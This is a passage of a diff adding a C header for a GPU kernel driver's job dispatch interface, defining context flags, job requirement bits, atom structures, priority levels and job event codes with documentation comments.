((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \ + BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* + * Private flags used on the base context + * + * These start at bit 31, and run down to zero. + * + * They share the same space as base_context_create_flags, and so must + * not collide with them. + */ + +/* Private flag tracking whether job descriptor dumping is disabled */ +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \ + ((base_context_create_flags)(1 << 31)) + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED) +/* + * Dependency stuff, keep it private for now. May want to expose it if + * we decide to make the number of semaphores a configurable + * option. + */ +#define BASE_JD_ATOM_COUNT 256 + +/* Maximum number of concurrent render passes. + */ +#define BASE_JD_RP_COUNT (256) + +/* Set/reset values for a software event */ +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1) +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0) + +/** + * struct base_jd_udata - Per-job data + * + * This structure is used to store per-job data, and is completely unused + * by the Base driver. It can be used to store things such as callback + * function pointer, data to handle job completion. It is guaranteed to be + * untouched by the Base driver. + * + * @blob: per-job data array + */ +struct base_jd_udata { + __u64 blob[2]; +}; + +/** + * typedef base_jd_dep_type - Job dependency type. 
+ * + * A flags field will be inserted into the atom structure to specify whether a + * dependency is a data or ordering dependency (by putting it before/after + * 'core_req' in the structure it should be possible to add without changing + * the structure size). + * When the flag is set for a particular dependency to signal that it is an + * ordering only dependency then errors will not be propagated. + */ +typedef __u8 base_jd_dep_type; + +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */ +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */ +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */ + +/** + * typedef base_jd_core_req - Job chain hardware requirements. + * + * A job chain must specify what GPU features it needs to allow the + * driver to schedule the job correctly. Failing to specify the + * correct settings can/will cause early job termination. Multiple + * values can be ORed together to specify multiple requirements. + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex + * dependencies, and doesn't execute anything on the hardware. + */ +typedef __u32 base_jd_core_req; + +/* Requirements that come from the HW */ + +/* No requirement, dependency only + */ +#define BASE_JD_REQ_DEP ((base_jd_core_req)0) + +/* Requires fragment shaders + */ +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0) + +/* Requires compute shaders + * + * This covers any of the following GPU job types: + * - Vertex Shader Job + * - Geometry Shader Job + * - An actual Compute Shader Job + * + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the + * job is specifically just the "Compute Shader" job type, and not the "Vertex + * Shader" nor the "Geometry Shader" job type. + */ +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1) + +/* Requires tiling */ +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2) + +/* Requires cache flushes */ +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3) + +/* Requires value writeback */ +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4) + +/* SW-only requirements - the HW does not expose these as part of the job slot + * capabilities + */ + +/* Requires fragment job with AFBC encoding */ +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13) + +/* SW-only requirement: coalesce completion events. + * If this bit is set then completion of this atom will not cause an event to + * be sent to userspace, whether successful or not; completion events will be + * deferred until an atom completes which does not have this bit set. + * + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES. + */ +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5) + +/* SW Only requirement: the job chain requires a coherent core group. We don't + * mind which coherent core group is used. + */ +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6) + +/* SW Only requirement: The performance counters should be enabled only when + * they are needed, to reduce power consumption. + */ +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7) + +/* SW Only requirement: External resources are referenced by this atom. + * + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and + * BASE_JD_REQ_SOFT_EVENT_WAIT. + */ +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8) + +/* SW Only requirement: Software defined job.
Jobs with this bit set will not be + * submitted to the hardware but will cause some action to happen within the + * driver + */ +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9) + +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1) +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2) +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3) + +/* 0x4 RESERVED for now */ + +/* SW only requirement: event wait/trigger job. + * + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set. + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the + * other waiting jobs. It completes immediately. + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it + * possible for other jobs to wait upon. It completes immediately. + */ +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5) +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6) +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7) + +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8) + +/* SW only requirement: Just In Time allocation + * + * This job requests a single or multiple just-in-time allocations through a + * list of base_jit_alloc_info structures which is passed via the jc element of + * the atom. The number of base_jit_alloc_info structures present in the + * list is passed via the nr_extres element of the atom + * + * It should be noted that the id entry in base_jit_alloc_info must not + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE. + * + * Should this soft job fail, it is expected that a BASE_JD_REQ_SOFT_JIT_FREE + * soft job is still made to free the JIT allocation. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9) + +/* SW only requirement: Just In Time free + * + * This job requests that a single or multiple just-in-time allocations created + * by BASE_JD_REQ_SOFT_JIT_ALLOC be freed. The ID list of the just-in-time + * allocations is passed via the jc element of the atom. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa) + +/* SW only requirement: Map external resource + * + * This job requests that external resource(s) be mapped once the dependencies + * of the job have been satisfied. The list of external resources is + * passed via the jc element of the atom, which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb) + +/* SW only requirement: Unmap external resource + * + * This job requests that external resource(s) be unmapped once the dependencies + * of the job have been satisfied. The list of external resources is + * passed via the jc element of the atom, which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc) + +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders) + * + * This indicates that the Job Chain contains GPU jobs of the 'Compute + * Shaders' type. + * + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */ +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10) + +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a + * particular core group + * + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag + * takes priority + * + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms. + * + * If the core availability policy is keeping the required core group turned + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code. + */ +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11) + +/* SW Flag: If this bit is set then the successful completion of this atom + * will not cause an event to be sent to userspace + */ +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12) + +/* SW Flag: If this bit is set then completion of this atom will not cause an + * event to be sent to userspace, whether successful or not. + */ +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14) + +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job starts which does not have this bit set or a job completes + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use + * if the CPU may have written to memory addressed by the job since the last job + * without this bit set was submitted. + */ +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15) + +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job completes which does not have this bit set or a job starts + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use + * if the CPU may read from or partially overwrite memory addressed by the job + * before the next job without this bit set completes. + */ +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16) + +/* Request the atom be executed on a specific job slot. + * + * When this flag is specified, it takes precedence over any existing job slot + * selection logic. + */ +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17) + +/* SW-only requirement: The atom is the start of a renderpass. + * + * If this bit is set then the job chain will be soft-stopped if it causes the + * GPU to write beyond the end of the physical pages backing the tiler heap, and + * committing more memory to the heap would exceed an internal threshold. It may + * be resumed after running one of the job chains attached to an atom with + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be + * resumed multiple times until it completes without memory usage exceeding the + * threshold. + * + * Usually used with BASE_JD_REQ_T. + */ +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18) + +/* SW-only requirement: The atom is the end of a renderpass. + * + * If this bit is set then the atom incorporates the CPU address of a + * base_jd_fragment object instead of the GPU address of a job chain. + * + * Which job chain is run depends upon whether the atom with the same renderpass + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or + * was soft-stopped when it exceeded an upper threshold for tiler heap memory + * usage. 
+ * + * It also depends upon whether one of the job chains attached to the atom has + * already been run as part of the same renderpass (in which case it would have + * written unresolved multisampled and otherwise-discarded output to temporary + * buffers that need to be read back). The job chain for doing a forced read and + * forced write (from/to temporary buffers) is run as many times as necessary. + * + * Usually used with BASE_JD_REQ_FS. + */ +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19) + +/* SW-only requirement: The atom needs to run on a limited core mask affinity. + * + * If this bit is set then the kbase_context.limited_core_mask will be applied + * to the affinity. + */ +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20) + +/* These requirement bits are currently unused in base_jd_core_req + */ +#define BASEP_JD_REQ_RESERVED \ + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \ + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \ + BASE_JD_REQ_EVENT_COALESCE | \ + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \ + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \ + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \ + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \ + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK)) + +/* Mask of all bits in base_jd_core_req that control the type of the atom. + * + * This allows dependency only atoms to have flags set + */ +#define BASE_JD_REQ_ATOM_TYPE \ + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \ + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE) + +/** + * Mask of all bits in base_jd_core_req that control the type of a soft job. + */ +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f) + +/* Returns non-zero value if core requirements passed define a soft job or + * a dependency only job. + */ +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \ + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \ + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP) + +/** + * enum kbase_jd_atom_state + * + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used. + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD. + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running). + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet + * handed back to job dispatcher for + * dependency resolution. + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed + * back to userspace. + */ +enum kbase_jd_atom_state { + KBASE_JD_ATOM_STATE_UNUSED, + KBASE_JD_ATOM_STATE_QUEUED, + KBASE_JD_ATOM_STATE_IN_JS, + KBASE_JD_ATOM_STATE_HW_COMPLETED, + KBASE_JD_ATOM_STATE_COMPLETED +}; + +/** + * typedef base_atom_id - Type big enough to store an atom number in. + */ +typedef __u8 base_atom_id; + +/** + * struct base_dependency - + * + * @atom_id: An atom number + * @dependency_type: Dependency type + */ +struct base_dependency { + base_atom_id atom_id; + base_jd_dep_type dependency_type; +}; + +/** + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering. + * + * @norm_read_norm_write: Job chain for full rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not exceed + * its memory usage threshold and no fragment job chain + * was previously run for the same renderpass. + * It is used no more than once per renderpass. 
+ * @norm_read_forced_write: Job chain for starting incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain exceeded + * its memory usage threshold for the first time and + * no fragment job chain was previously run for the + * same renderpass. + * Writes unresolved multisampled and normally- + * discarded output to temporary buffers that must be + * read back by a subsequent forced_read job chain + * before the renderpass is complete. + * It is used no more than once per renderpass. + * @forced_read_forced_write: Job chain for continuing incremental + * rendering. + * GPU address of a fragment job chain to render in + * the circumstance where the tiler job chain + * exceeded its memory usage threshold again + * and a fragment job chain was previously run for + * the same renderpass. + * Reads unresolved multisampled and + * normally-discarded output from temporary buffers + * written by a previous forced_write job chain and + * writes the same to temporary buffers again. + * It is used as many times as required until + * rendering completes. + * @forced_read_norm_write: Job chain for ending incremental rendering. + * GPU address of a fragment job chain to render in the + * circumstance where the tiler job chain did not + * exceed its memory usage threshold this time and a + * fragment job chain was previously run for the same + * renderpass. + * Reads unresolved multisampled and normally-discarded + * output from temporary buffers written by a previous + * forced_write job chain in order to complete a + * renderpass. + * It is used no more than once per renderpass. + * + * This structure is referenced by the main atom structure if + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req. + */ +struct base_jd_fragment { + __u64 norm_read_norm_write; + __u64 norm_read_forced_write; + __u64 forced_read_forced_write; + __u64 forced_read_norm_write; +}; + +/** + * typedef base_jd_prio - Base Atom priority. + * + * Only certain priority levels are actually implemented, as specified by the + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority + * level that is not one of those defined below. + * + * Priority levels only affect scheduling after the atoms have had dependencies + * resolved. For example, a low priority atom that has had its dependencies + * resolved might run before a higher priority atom that has not had its + * dependencies resolved. + * + * In general, fragment atoms do not affect non-fragment atoms with + * lower priorities, and vice versa. One exception is that there is only one + * priority value for each context. So a high-priority (e.g.) fragment atom + * could increase its context priority, causing its non-fragment atoms to also + * be scheduled sooner. + * + * The atoms are scheduled as follows with respect to their priorities: + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies + * resolved, and atom 'X' has a higher priority than atom 'Y' + * * If atom 'Y' is currently running on the HW, then it is interrupted to + * allow atom 'X' to run soon after + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y' + * * Any two atoms that have the same priority could run in any order with + * respect to each other. That is, there is no ordering constraint between + * atoms of the same priority. 
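+ * + * For example (illustrative, not driver text): if a BASE_JD_PRIO_HIGH atom + * and a BASE_JD_PRIO_MEDIUM atom are ready for the same job slot and the + * medium one is already running on the HW, the medium one is interrupted so + * that the high one can run soon after.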
+ * + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are + * scheduled between contexts. The default value, 0, will cause higher-priority + * atoms to be scheduled first, regardless of their context. The value 1 will + * use a round-robin algorithm when deciding which context's atoms to schedule + * next, so higher-priority atoms can only preempt lower priority atoms within + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details. + */ +typedef __u8 base_jd_prio; + +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */ +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0) +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and + * BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1) +/* Low atom priority. */ +#define BASE_JD_PRIO_LOW ((base_jd_prio)2) +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH, + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW + */ +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3) + +/* Count of the number of priority levels. This itself is not a valid + * base_jd_prio setting + */ +#define BASE_JD_NR_PRIO_LEVELS 4 + +/** + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a + * GPU job chain or soft-job to the kernel driver. + * + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One needs to use a SETTER function to assign + * this field; this is done in order to reduce the possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + * + * This structure has changed since UK 10.2 for which base_jd_core_req was a + * __u16 value. + * + * In UK 10.3 a core_req field of a __u32 type was added to the end of the + * structure, and the place in the structure previously occupied by __u16 + * core_req was kept but renamed to compat_core_req. + * + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2]. + * Compatibility with UK 10.x from UK 11.y is not handled because + * the major version increase prevents this. + * + * For UK 11.20 jit_id[2] must be initialized to zero.
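+ * + * A minimal initialization sketch (assumed userspace usage; job_chain_gpu_va + * is a hypothetical name, and this example is not part of the original + * header): + * + * struct base_jd_atom_v2 atom = {0}; + * atom.jc = job_chain_gpu_va; + * atom.atom_number = 1; + * atom.prio = BASE_JD_PRIO_MEDIUM; + * atom.core_req = BASE_JD_REQ_FS; + * + * jit_id[2] and padding are left zeroed, as required from UK 11.20 onwards.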
+ */ +struct base_jd_atom_v2 { + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +}; + +/** + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr + * at the beginning. + * + * @seq_nr: Sequence number of logical grouping of atoms. + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS + * is set in the base_jd_core_req) the CPU address of a + * base_jd_fragment object. + * @udata: User data. + * @extres_list: List of external resources. + * @nr_extres: Number of external resources or JIT allocations. + * @jit_id: Zero-terminated array of IDs of just-in-time memory + * allocations written to by the atom. When the atom + * completes, the value stored at the + * &struct_base_jit_alloc_info.heap_info_gpu_addr of + * each allocation is read in order to enforce an + * overall physical memory usage limit. + * @pre_dep: Pre-dependencies. One needs to use a SETTER function to assign + * this field; this is done in order to reduce the possibility of + * improper assignment of a dependency field. + * @atom_number: Unique number to identify the atom. + * @prio: Atom priority. Refer to base_jd_prio for more details. + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP + * specified. + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified. + * @core_req: Core requirements. + * @renderpass_id: Renderpass identifier used to associate an atom that has + * BASE_JD_REQ_START_RENDERPASS set in its core requirements + * with an atom that has BASE_JD_REQ_END_RENDERPASS set. + * @padding: Unused. Must be zero. + */ +typedef struct base_jd_atom { + __u64 seq_nr; + __u64 jc; + struct base_jd_udata udata; + __u64 extres_list; + __u16 nr_extres; + __u8 jit_id[2]; + struct base_dependency pre_dep[2]; + base_atom_id atom_number; + base_jd_prio prio; + __u8 device_nr; + __u8 jobslot; + base_jd_core_req core_req; + __u8 renderpass_id; + __u8 padding[7]; +} base_jd_atom; + +struct base_jit_alloc_info { + __u64 gpu_alloc_addr; + __u64 va_pages; + __u64 commit_pages; + __u64 extension; + __u8 id; + __u8 bin_id; + __u8 max_allocations; + __u8 flags; + __u8 padding[2]; + __u16 usage_id; + __u64 heap_info_gpu_addr; +}; + +/* Job chain event code bits + * Defines the bits used to create ::base_jd_event_code + */ +enum { + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */ + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */ + /* Event indicates success (SW events only) */ + BASE_JD_SW_EVENT_SUCCESS = (1u << 13), + BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */ + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */ + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */ + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */ + /* Mask to extract the type from an event code */ + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11) +}; + +/** + * enum base_jd_event_code - Job chain event codes + * + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status + * codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, because the + * job was hard-stopped. + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as + * 'previous job done'. + * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes + * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job + * was hard stopped. + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on + * complete/fail/cancel. + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes. + * Obscurely, BASE_JD_EVENT_TERMINATED + * indicates a real fault, + * because the job was hard-stopped. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and + * software error status codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status + * codes. + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes. + * Such codes are never returned to + * user-space. + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes. + * @BASE_JD_EVENT_DONE: atom has completed successfully + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which + * shall result in a failed atom + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the + * part of the memory system required to access + * job descriptors was not powered on + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job + * manager failed + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job + * manager failed + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the + * specified affinity mask does not intersect + * any available cores + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program + * counter was executed. + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal + * encoding was executed. + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where + * the instruction encoding did not match the + * instruction type encoded in the program + * counter. + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that + * contained invalid combinations of operands. + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried + * to access the thread local storage section + * of another thread. + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that + * tried to do an unsupported unaligned memory + * access. + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that + * failed to complete an instruction barrier. + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job + * contains invalid combinations of data. + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to + * process a tile that is entirely outside the + * bounding box of the frame. + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address + * has been found that exceeds the virtual + * address range. + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job. + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only + * the first one that reports an error will set + * and return full error information. + * Subsequent failing jobs will not update the + * error status registers, and may write an + * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to + * physical memory where the original virtual + * address is no longer available. + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache + * has detected that the same line has been + * accessed as both shareable and non-shareable + * memory from inside the GPU. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table + * entry at level 1 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table + * entry at level 2 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table + * entry at level 3 of the translation table. + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table + * entry at level 4 of the translation table. + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to + * the permission flags set in translation + * table + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading + * level 0 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading + * level 1 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading + * level 2 of the translation tables. + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading + * level 3 of the translation tables. + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a + * translation table entry with the ACCESS_FLAG + * bit set to zero in level 0 of the + * page table, and the DISABLE_AF_FAULT flag + * was not set. + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to + * grow memory on demand + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its + * dependencies failed + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data + * in the atom which overlaps with + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the + * platform doesn't support the feature specified in + * the atom. + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate + * to userspace that the KBase context has been + * destroyed and Base should stop listening for + * further events + * 